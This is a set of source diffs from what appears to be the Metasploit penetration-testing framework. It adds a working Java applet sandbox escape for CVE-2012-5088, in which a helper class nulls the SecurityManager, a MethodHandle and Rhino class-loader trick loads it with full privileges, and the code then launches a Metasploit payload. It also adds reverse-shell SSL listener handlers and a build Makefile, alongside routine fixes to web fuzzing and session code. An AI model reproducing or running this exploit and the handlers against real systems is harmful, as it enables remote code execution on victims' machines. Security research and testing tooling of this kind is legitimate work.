@ -0,0 +1,19 @@
|
|||
import java.security.AccessController;
|
||||
import java.security.PrivilegedExceptionAction;
|
||||
|
||||
public class B
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
public B()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this); } catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public Object run() {
|
||||
System.setSecurityManager(null);
|
||||
return new Object();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,66 @@
|
|||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
//import java.lang.Runtime;
|
||||
import java.applet.Applet;
|
||||
import java.lang.invoke.MethodHandle;
|
||||
import java.lang.invoke.MethodHandles;
|
||||
import java.lang.invoke.MethodType;
|
||||
import java.lang.reflect.Method;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
|
||||
MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
|
||||
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
|
||||
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Throwable ex)
|
||||
{
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
CLASSES = \
|
||||
Exploit.java \
|
||||
B.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2012-5088/
|
||||
mv B.class ../../../../data/exploits/cve-2012-5088/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
@ -260,7 +260,8 @@ public abstract class RpcConnection {
|
|||
// Don't fork cause we'll check if it dies
|
||||
String rpcType = "Basic";
|
||||
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
|
||||
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
|
||||
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
|
||||
"-p",Integer.toString(defaultPort)}));
|
||||
if(!defaultSsl)
|
||||
args.add("-S");
|
||||
if(disableDb)
|
||||
|
|
|
@ -50,7 +50,8 @@ module Auxiliary::Login
|
|||
\n\*$ |
|
||||
(Login ?|User ?)(name|): |
|
||||
^\s*\<[a-f0-9]+\>\s*$ |
|
||||
^\s*220.*FTP
|
||||
^\s*220.*FTP|
|
||||
not\ allowed\ to\ log\ in
|
||||
)/mix
|
||||
|
||||
@waiting_regex = /(?:
|
||||
|
|
|
@ -250,7 +250,9 @@ module Auxiliary::Web
|
|||
|
||||
if !(payload = opts[:payload])
|
||||
if payloads
|
||||
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
|
||||
payload = payloads.select { |p|
|
||||
element.altered_value.include?( p )
|
||||
}.sort_by { |p| p.size }.last
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -101,7 +101,7 @@ module Analysis::Differential
|
|||
# save the response and some data for analysis
|
||||
responses[:good][elem.altered] << {
|
||||
'res' => res,
|
||||
'elem' => elem
|
||||
'elem' => elem.dup
|
||||
}
|
||||
end
|
||||
end
|
||||
|
@ -122,8 +122,7 @@ module Analysis::Differential
|
|||
http.if_not_custom_404( action, res['res'].body ) do
|
||||
# if this isn't a custom 404 page then it means that
|
||||
# the element is vulnerable, so go ahead and log the issue
|
||||
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
|
||||
:payload => res['elem'].altered_value )
|
||||
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -54,7 +54,8 @@ module Analysis::Timing
|
|||
timeout = opts[:delay]
|
||||
|
||||
seed = p.altered_value.dup
|
||||
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
|
||||
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
|
||||
sort_by { |p2| p2.size }.last
|
||||
|
||||
# 1st pass, make sure the webapp is responsive
|
||||
if_responsive do
|
||||
|
|
|
@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
|
|||
|
||||
tl = []
|
||||
loop do
|
||||
# Spawn threads for each host
|
||||
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
|
||||
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
|
||||
request.handle_response request( request.url, request.opts )
|
||||
# Keep callback failures isolated.
|
||||
begin
|
||||
request.handle_response request( request.url, request.opts )
|
||||
rescue => e
|
||||
elog e.to_s
|
||||
e.backtrace.each { |l| elog l }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -261,10 +266,12 @@ class Auxiliary::Web::HTTP
|
|||
end
|
||||
|
||||
def _request( url, opts = {} )
|
||||
body = opts[:body]
|
||||
body = opts[:body]
|
||||
timeout = opts[:timeout] || 10
|
||||
method = opts[:method].to_s.upcase || 'GET'
|
||||
url = url.is_a?( URI ) ? url : URI( url.to_s )
|
||||
method = opts[:method].to_s.upcase || 'GET'
|
||||
url = url.is_a?( URI ) ? url : URI( url.to_s )
|
||||
|
||||
rex_overrides = opts.delete( :rex ) || {}
|
||||
|
||||
param_opts = {}
|
||||
|
||||
|
@ -280,10 +287,11 @@ class Auxiliary::Web::HTTP
|
|||
end
|
||||
|
||||
opts = @request_opts.merge( param_opts ).merge(
|
||||
'uri' => url.path || '/',
|
||||
'method' => method,
|
||||
'uri' => url.path || '/',
|
||||
'method' => method,
|
||||
'headers' => headers.merge( opts[:headers] || {} )
|
||||
)
|
||||
# Allow for direct rex overrides
|
||||
).merge( rex_overrides )
|
||||
|
||||
opts['data'] = body if body
|
||||
|
||||
|
@ -291,7 +299,12 @@ class Auxiliary::Web::HTTP
|
|||
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
|
||||
rescue ::Timeout::Error
|
||||
Response.timed_out
|
||||
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
|
||||
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
|
||||
# This is bad but we can't anticipate the gazilion different types of network
|
||||
# i/o errors between Rex and Errno.
|
||||
rescue => e
|
||||
elog e.to_s
|
||||
e.backtrace.each { |l| elog l }
|
||||
Response.empty
|
||||
end
|
||||
|
||||
|
|
|
@ -71,7 +71,7 @@ module Auxiliary::WmapModule
|
|||
else
|
||||
res << datastore['VHOST']
|
||||
end
|
||||
res << ":" + wmap_target_port
|
||||
res << ":" + wmap_target_port.to_s
|
||||
res
|
||||
end
|
||||
|
||||
|
|
|
@ -679,8 +679,8 @@ class DBManager
|
|||
# In the case of multi handler we cannot yet determine the true
|
||||
# exploit responsible. But we can at least show the parent versus
|
||||
# just the generic handler:
|
||||
if session and session.via_exploit == "exploit/multi/handler"
|
||||
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
|
||||
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
|
||||
end
|
||||
|
||||
s = ::Mdm::Session.new(sess_data)
|
||||
|
@ -696,9 +696,9 @@ class DBManager
|
|||
|
||||
mod = framework.modules.create(session.via_exploit)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
mod_fullname = sess_data[:datastore]['ParentModule']
|
||||
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
|
||||
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
mod_fullname = sess_data[:datastore]['ParentModule']
|
||||
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
|
||||
else
|
||||
mod_name = mod.name
|
||||
mod_fullname = mod.fullname
|
||||
|
@ -720,7 +720,7 @@ class DBManager
|
|||
|
||||
vuln = framework.db.report_vuln(vuln_info)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
via_exploit = sess_data[:datastore]['ParentModule']
|
||||
else
|
||||
via_exploit = session.via_exploit
|
||||
|
|
|
@ -22,7 +22,9 @@ module Exploit::FileDropper
|
|||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
# read-only flag with a command.
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
if session.platform =~ /win/
|
||||
session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||
end
|
||||
session.fs.file.rm(file)
|
||||
print_good("Deleted #{file}")
|
||||
true
|
||||
|
|
|
@ -26,11 +26,13 @@ module Exploit::Remote::FtpServer
|
|||
], Msf::Exploit::Remote::FtpServer)
|
||||
end
|
||||
|
||||
# (see Msf::Exploit#setup)
|
||||
def setup
|
||||
super
|
||||
@state = {}
|
||||
end
|
||||
|
||||
# (see TcpServer#on_client_connect)
|
||||
def on_client_connect(c)
|
||||
@state[c] = {
|
||||
:name => "#{c.peerhost}:#{c.peerport}",
|
||||
|
@ -46,6 +48,25 @@ module Exploit::Remote::FtpServer
|
|||
c.put "220 FTP Server Ready\r\n"
|
||||
end
|
||||
|
||||
# Dispatches client requests to command handlers.
|
||||
#
|
||||
# Handlers should be named +on_client_command_*+, ending with a
|
||||
# downcased FTP verb, e.g. +on_client_command_user+. If no handler
|
||||
# exists for the given command, returns a generic default response.
|
||||
#
|
||||
# @example Handle SYST requests
|
||||
# class Metasploit4 < Msf::Exploit
|
||||
# include Msf::Exploit::Remote::FtpServer
|
||||
# ...
|
||||
# def on_client_command_syst(cmd_conn, arg)
|
||||
# print_status("Responding to SYST request")
|
||||
# buf = build_exploit_buffer(cmd_conn)
|
||||
# cmd_conn.put("215 Unix Type: #{buf}\r\n")
|
||||
# end
|
||||
# end
|
||||
#
|
||||
# @param (see TcpServer#on_client_data)
|
||||
# @return (see TcpServer#on_client_data)
|
||||
def on_client_data(c)
|
||||
data = c.get_once
|
||||
return if not data
|
||||
|
@ -184,6 +205,15 @@ module Exploit::Remote::FtpServer
|
|||
end
|
||||
|
||||
|
||||
# Create a socket for the protocol data, either PASV or PORT,
|
||||
# depending on the client.
|
||||
#
|
||||
# @see http://tools.ietf.org/html/rfc3659 RFC 3659
|
||||
# @see http://tools.ietf.org/html/rfc959 RFC 959
|
||||
# @param c [Socket] Control connection socket
|
||||
#
|
||||
# @return [Socket] A connected socket for the data connection
|
||||
# @return [nil] on failure
|
||||
def establish_data_connection(c)
|
||||
begin
|
||||
Timeout.timeout(20) do
|
||||
|
|
|
@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
|
|||
end
|
||||
|
||||
#
|
||||
# Make sure the URI starts with a slash and doesn't end with one
|
||||
# Returns a modified version of the URI that:
|
||||
# 1. Always has a starting slash
|
||||
# 2. Removes all the double slashes
|
||||
#
|
||||
def normalize_uri(str)
|
||||
def normalize_uri(*strs)
|
||||
new_str = strs * "/"
|
||||
|
||||
unless str.to_s[0,1] == "/"
|
||||
str = "/" + str.to_s
|
||||
new_str = new_str.gsub!("//", "/") while new_str.index("//")
|
||||
|
||||
# Makes sure there's a starting slash
|
||||
unless new_str[0,1] == '/'
|
||||
new_str = '/' + new_str
|
||||
end
|
||||
|
||||
str = str.gsub(/^\/+/, '/')
|
||||
unless str.length == 1
|
||||
str = str.gsub(/\/+$/, '')
|
||||
end
|
||||
|
||||
str
|
||||
new_str
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -28,7 +28,7 @@ module Exploit::Remote::Web
|
|||
super
|
||||
|
||||
register_options([
|
||||
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
|
||||
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
|
||||
OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
|
@ -75,14 +75,21 @@ module Exploit::Remote::Web
|
|||
|
||||
def exploit
|
||||
print_status "Sending HTTP request for #{path}"
|
||||
if res = perform_request
|
||||
print_status "The server responded with HTTP status code #{res.code}."
|
||||
else
|
||||
print_status 'The server did not respond to our request.'
|
||||
end
|
||||
res = perform_request
|
||||
if res
|
||||
print_status "The server responded with HTTP status code #{res.code}."
|
||||
else
|
||||
print_status 'The server did not respond to our request.'
|
||||
end
|
||||
handler
|
||||
end
|
||||
|
||||
def tries
|
||||
1
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def perform_request
|
||||
send_request_cgi({
|
||||
'global' => true,
|
||||
|
|
|
@ -0,0 +1,300 @@
|
|||
# -*- coding: binary -*-
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This module implements the reverse double TCP handler. This means
|
||||
# that it listens on a port waiting for a two connections, one connection
|
||||
# is treated as stdin, the other as stdout.
|
||||
#
|
||||
# This handler depends on having a local host and port to
|
||||
# listen on.
|
||||
#
|
||||
###
|
||||
module ReverseTcpDoubleSSL
|
||||
|
||||
include Msf::Handler
|
||||
|
||||
#
|
||||
# Returns the string representation of the handler type, in this case
|
||||
# 'reverse_tcp_double'.
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_tcp_double_ssl"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'reverse'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"reverse"
|
||||
end
|
||||
|
||||
#
|
||||
# Initializes the reverse TCP handler and ads the options that are required
|
||||
# for all reverse TCP payloads, like local host and local port.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::LHOST,
|
||||
Opt::LPORT(4444)
|
||||
], Msf::Handler::ReverseTcpDoubleSSL)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
|
||||
], Msf::Handler::ReverseTcpDoubleSSL)
|
||||
|
||||
self.conn_threads = []
|
||||
end
|
||||
|
||||
#
|
||||
# Starts the listener but does not actually attempt
|
||||
# to accept a connection. Throws socket exceptions
|
||||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
|
||||
end
|
||||
self.listener_sock = Rex::Socket::TcpServer.create(
|
||||
# 'LocalHost' => datastore['LHOST'],
|
||||
'LocalPort' => datastore['LPORT'].to_i,
|
||||
'Comm' => comm,
|
||||
'SSL' => true,
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfPayload' => self,
|
||||
'MsfExploit' => assoc_exploit
|
||||
})
|
||||
end
|
||||
|
||||
#
|
||||
# Closes the listener socket if one was created.
|
||||
#
|
||||
def cleanup_handler
|
||||
stop_handler
|
||||
|
||||
# Kill any remaining handle_connection threads that might
|
||||
# be hanging around
|
||||
conn_threads.each { |thr|
|
||||
thr.kill
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Starts monitoring for an inbound connection.
|
||||
#
|
||||
def start_handler
|
||||
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
|
||||
sock_inp = nil
|
||||
sock_out = nil
|
||||
|
||||
print_status("Started reverse double handler")
|
||||
|
||||
begin
|
||||
# Accept two client connection
|
||||
begin
|
||||
client_a = self.listener_sock.accept
|
||||
print_status("Accepted the first client connection...")
|
||||
|
||||
client_b = self.listener_sock.accept
|
||||
print_status("Accepted the second client connection...")
|
||||
|
||||
sock_inp, sock_out = detect_input_output(client_a, client_b)
|
||||
|
||||
rescue
|
||||
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
|
||||
return nil
|
||||
end
|
||||
|
||||
# Increment the has connection counter
|
||||
self.pending_connections += 1
|
||||
|
||||
# Start a new thread and pass the client connection
|
||||
# as the input and output pipe. Client's are expected
|
||||
# to implement the Stream interface.
|
||||
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
|
||||
begin
|
||||
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
|
||||
handle_connection(chan.lsock)
|
||||
rescue
|
||||
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
||||
}
|
||||
end while true
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Accept two sockets and determine which one is the input and which
|
||||
# is the output. This method assumes that these sockets pipe to a
|
||||
# remote shell, it should overridden if this is not the case.
|
||||
#
|
||||
def detect_input_output(sock_a, sock_b)
|
||||
|
||||
begin
|
||||
|
||||
# Flush any pending socket data
|
||||
sock_a.get_once if sock_a.has_read_data?(0.25)
|
||||
sock_b.get_once if sock_b.has_read_data?(0.25)
|
||||
|
||||
etag = Rex::Text.rand_text_alphanumeric(16)
|
||||
echo = "echo #{etag};\n"
|
||||
|
||||
print_status("Command: #{echo.strip}")
|
||||
|
||||
print_status("Writing to socket A")
|
||||
sock_a.put(echo)
|
||||
|
||||
print_status("Writing to socket B")
|
||||
sock_b.put(echo)
|
||||
|
||||
print_status("Reading from sockets...")
|
||||
|
||||
resp_a = ''
|
||||
resp_b = ''
|
||||
|
||||
if (sock_a.has_read_data?(1))
|
||||
print_status("Reading from socket A")
|
||||
resp_a = sock_a.get_once
|
||||
print_status("A: #{resp_a.inspect}")
|
||||
end
|
||||
|
||||
if (sock_b.has_read_data?(1))
|
||||
print_status("Reading from socket B")
|
||||
resp_b = sock_b.get_once
|
||||
print_status("B: #{resp_b.inspect}")
|
||||
end
|
||||
|
||||
print_status("Matching...")
|
||||
if (resp_b.match(etag))
|
||||
print_status("A is input...")
|
||||
return sock_a, sock_b
|
||||
else
|
||||
print_status("B is input...")
|
||||
return sock_b, sock_a
|
||||
end
|
||||
|
||||
rescue ::Exception
|
||||
print_status("Caught exception in detect_input_output: #{$!}")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Stops monitoring for an inbound connection.
|
||||
#
|
||||
def stop_handler
|
||||
# Terminate the listener thread
|
||||
if (self.listener_thread and self.listener_thread.alive? == true)
|
||||
self.listener_thread.kill
|
||||
self.listener_thread = nil
|
||||
end
|
||||
|
||||
if (self.listener_sock)
|
||||
self.listener_sock.close
|
||||
self.listener_sock = nil
|
||||
end
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_accessor :listener_sock # :nodoc:
|
||||
attr_accessor :listener_thread # :nodoc:
|
||||
attr_accessor :conn_threads # :nodoc:
|
||||
|
||||
|
||||
module TcpReverseDoubleSSLChannelExt
|
||||
attr_accessor :localinfo
|
||||
attr_accessor :peerinfo
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class wrappers the communication channel built over the two inbound
|
||||
# connections, allowing input and output to be split across both.
|
||||
#
|
||||
###
|
||||
class TcpReverseDoubleSSLSessionChannel
|
||||
|
||||
include Rex::IO::StreamAbstraction
|
||||
|
||||
def initialize(framework, inp, out)
|
||||
@framework = framework
|
||||
@sock_inp = inp
|
||||
@sock_out = out
|
||||
|
||||
initialize_abstraction
|
||||
|
||||
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
|
||||
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
|
||||
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
|
||||
|
||||
monitor_shell_stdout
|
||||
end
|
||||
|
||||
#
|
||||
# Funnel data from the shell's stdout to +rsock+
|
||||
#
|
||||
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
|
||||
# the client (user input). From there, it calls our write() below,
|
||||
# funneling the data to the shell's stdin on the other side.
|
||||
#
|
||||
def monitor_shell_stdout
|
||||
|
||||
# Start a thread to pipe data between stdin/stdout and the two sockets
|
||||
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
|
||||
begin
|
||||
while true
|
||||
# Handle data from the server and write to the client
|
||||
if (@sock_out.has_read_data?(0.50))
|
||||
buf = @sock_out.get_once
|
||||
break if buf.nil?
|
||||
rsock.put(buf)
|
||||
end
|
||||
end
|
||||
rescue ::Exception => e
|
||||
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
|
||||
end
|
||||
|
||||
# Clean up the sockets...
|
||||
begin
|
||||
@sock_inp.close
|
||||
@sock_out.close
|
||||
rescue ::Exception
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def write(buf, opts={})
|
||||
@sock_inp.write(buf, opts)
|
||||
end
|
||||
|
||||
def read(length=0, opts={})
|
||||
@sock_out.read(length, opts)
|
||||
end
|
||||
|
||||
#
|
||||
# Closes the stream abstraction and kills the monitor thread.
|
||||
#
|
||||
def close
|
||||
@monitor_thread.kill if (@monitor_thread)
|
||||
@monitor_thread = nil
|
||||
|
||||
cleanup_abstraction
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,124 @@
|
|||
require 'rex/socket'
|
||||
require 'thread'
|
||||
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This module implements the reverse TCP handler. This means
|
||||
# that it listens on a port waiting for a connection until
|
||||
# either one is established or it is told to abort.
|
||||
#
|
||||
# This handler depends on having a local host and port to
|
||||
# listen on.
|
||||
#
|
||||
###
|
||||
module ReverseTcpSsl
|
||||
|
||||
include Msf::Handler::ReverseTcp
|
||||
|
||||
#
|
||||
# Returns the string representation of the handler type, in this case
|
||||
# 'reverse_tcp_ssl'.
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_tcp_ssl"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'reverse'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"reverse"
|
||||
end
|
||||
|
||||
#
|
||||
# Initializes the reverse TCP SSL handler and adds the certificate option.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
register_advanced_options(
|
||||
[
|
||||
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
|
||||
], Msf::Handler::ReverseTcpSsl)
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Starts the listener but does not actually attempt
|
||||
# to accept a connection. Throws socket exceptions
|
||||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
|
||||
end
|
||||
|
||||
ex = false
|
||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||
# First attempt to bind LHOST. If that fails, the user probably has
|
||||
# something else listening on that interface. Try again with ANY_ADDR.
|
||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||
|
||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||
|
||||
comm = datastore['ReverseListenerComm']
|
||||
if comm.to_s == "local"
|
||||
comm = ::Rex::Socket::Comm::Local
|
||||
else
|
||||
comm = nil
|
||||
end
|
||||
|
||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
# Only try to bind to this specific interface
|
||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||
|
||||
# Pick the right "any" address if either wildcard is used
|
||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||
end
|
||||
addrs.each { |ip|
|
||||
begin
|
||||
|
||||
comm.extend(Rex::Socket::SslTcp)
|
||||
self.listener_sock = Rex::Socket::SslTcpServer.create(
|
||||
'LocalHost' => datastore['LHOST'],
|
||||
'LocalPort' => datastore['LPORT'].to_i,
|
||||
'Comm' => comm,
|
||||
'SSLCert' => datastore['SSLCert'],
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfPayload' => self,
|
||||
'MsfExploit' => assoc_exploit
|
||||
})
|
||||
|
||||
ex = false
|
||||
|
||||
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
|
||||
comm_used = Rex::Socket::Comm::Local if comm_used == nil
|
||||
|
||||
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
|
||||
via = "via the #{comm_used.type} on session #{comm_used.sid}"
|
||||
else
|
||||
via = ""
|
||||
end
|
||||
|
||||
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
|
||||
break
|
||||
rescue
|
||||
ex = $!
|
||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
||||
end
|
||||
}
|
||||
raise ex if (ex)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -479,4 +479,20 @@ class Msf::Module::Platform
|
|||
Rank = 100
|
||||
Alias = "php"
|
||||
end
|
||||
|
||||
#
|
||||
# JavaScript
|
||||
#
|
||||
class JavaScript < Msf::Module::Platform
|
||||
Rank = 100
|
||||
Alias = "js"
|
||||
end
|
||||
|
||||
#
|
||||
# Python
|
||||
#
|
||||
class Python < Msf::Module::Platform
|
||||
Rank = 100
|
||||
Alias = "python"
|
||||
end
|
||||
end
|
||||
|
|
|
@ -35,15 +35,14 @@ module Msf::Payload::Java
|
|||
end
|
||||
|
||||
#
|
||||
# Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define
|
||||
# a list of class files in @class_files which are pulled from
|
||||
# Msf::Config.data_directory. The configuration file is created by the
|
||||
# payload's #config method.
|
||||
#
|
||||
# +opts+ can include:
|
||||
# +:main_class+:: the name of the Main-Class attribute in the manifest.
|
||||
# Defaults to "metasploit.Payload"
|
||||
# Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers
|
||||
# define a list of class files in @class_files which are pulled from
|
||||
# {Msf::Config.data_directory}. The configuration file is created by
|
||||
# the payload's #config method.
|
||||
#
|
||||
# @option opts :main_class [String] the name of the Main-Class
|
||||
# attribute in the manifest. Defaults to "metasploit.Payload"
|
||||
# @return [Rex::Zip::Jar]
|
||||
def generate_jar(opts={})
|
||||
raise if not respond_to? :config
|
||||
# Allow changing the jar's Main Class in the manifest so wrappers
|
||||
|
